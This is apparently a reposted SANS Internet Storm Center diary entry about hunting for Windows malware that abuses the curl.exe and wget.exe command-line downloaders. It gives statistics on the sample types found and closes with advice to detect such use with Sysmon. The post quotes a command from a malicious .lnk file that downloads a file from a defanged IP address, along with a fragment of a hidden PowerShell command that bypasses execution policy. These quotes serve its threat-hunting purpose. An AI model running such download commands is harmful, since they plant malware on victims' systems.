Keep an Eye on Command-Line Browsers, (Fri, Feb 14th)

For a few weeks, I’m searching for suspicious files that make use of a command line browser like curl.exe or wget.exe in Windows environment. Wait, you were not aware of this? Just open a cmd.exe and type ‘curl.exe’ on your Windows 10 host:

If tools like bitsadmin.exe are well-known to be (ab)used by malware samples[1], today, less attention is given to command-llne browsers like curl.exe or wget.exe. Those tools are powerfull (see my diary about many curl features[2]) and, in my opinion, deserve to be kept under your hunting rules.

I’m hunting for samples on VT that use one of those two browsers and I found a bunch of them:

Most of them are PE files and the average detection score is 16.

Win32 EXE 208
ZIP 40
RAR 12
Windows Installer 9
MS Word Document 3
Windows shortcut 2
Android 1
Win32 DLL 1
unknown 1

Some of them are very simple but effective. Here is an example of command embedded in a malicious .lnk file :

C:WindowsSystem32cmd.exe /c curl.exe hxxp://87[.]57[.]141[.]215/Cell.png -o C:WindowsTasksCell.png

If curl.exe is available as a standard tool in latest Windows operating systems, don’t forget that tools can be installed via 3rd party applications or packages. I searched across many Windows devices and found alternatives:

(Via GNU tools)
C:Program Files (x86)GnuWin32binwget.exe
(Via MingW)
(Or Cygwin)
C:Program FilesCygwinbinwget.exe

Sometimes, if no command-line browser is not available, the sample just downloads its own copy. Example:

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass 
    -noprofile -windowstyle hidden 
&start start2.bat

I found very old samples that used wget.exe to fetch malicious files (one from 2015!) but today we have powerful tools to keep an eye on such tools, a Sysmon rule can be helpful to track them:


Happy hunting!


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) ↓